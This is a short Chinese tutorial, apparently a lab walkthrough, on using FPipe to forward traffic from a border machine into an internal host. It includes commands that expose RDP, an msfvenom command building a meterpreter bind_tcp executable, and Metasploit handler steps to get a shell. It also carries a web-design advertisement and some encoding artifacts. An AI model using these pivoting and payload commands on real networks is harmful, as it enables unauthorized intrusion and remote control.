這篇文章給大家介紹如何理解FPipe端口轉發(fā),內容非常詳細,感興趣的小伙伴們可以參考借鑒,希望對大家能有所幫助。
網(wǎng)站建設哪家好,找成都創(chuàng)新互聯(lián)公司!專注于網(wǎng)頁設計、網(wǎng)站建設、微信開發(fā)、微信小程序開發(fā)、集團企業(yè)網(wǎng)站建設等服務項目。為回饋新老客戶創(chuàng)新互聯(lián)還提供了順慶免費建站歡迎大家使用!
注:
邊界機器 win08 192.168.222.175
內網(wǎng)機器 win7 192.168.222.137
msf機器 Ubuntu 192.168.222.177
0x01 FPipe介紹
FPipe即forward pipe,在兩個端口中間建立一個管道,來實現(xiàn)流量的轉發(fā),一般用于內網(wǎng)機器不能正常上網(wǎng)的情況,而且不需要考慮免殺,但是必須要有邊界機器,它不僅支持TCP流量的轉發(fā),還支持UDP的。
0x02 端口轉發(fā)
將來自外部53端口的流量,通過本地的53端口轉發(fā)到內網(wǎng)的3389端口
fpipe.exe -l 53 -i 0.0.0.0 -s 53 -r 3389 192.168.222.137
然后回到本地來遠程連接就可以了
0x03 msf正向上線
這里我們使用bind型的payload,保證讓無法正常上網(wǎng)的內網(wǎng)主機也能正常反彈shell
正常生成一個馬
msfvenom -p windows/x64/meterpreter/bind_tcp lport=53 -f exe >> 123.exe
之后去邊界機器執(zhí)行轉發(fā)
fpipe.exe -l 53 -i 0.0.0.0 -s 53 -r 53 192.168.222.137
在內網(wǎng)機器上運行我們的馬
回到Ubuntu上進行監(jiān)聽
use exploit/multi/handlerset payload windows/x64/meterpreter/bind_tcpset lport 53set rhost 192.168.222.175run
這里的Died是生成的馬有問題,之后換一下payload就可以搞定了,這個不必在意
根據(jù)實際情況來進行使用就ok了
關于如何理解FPipe端口轉發(fā)就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。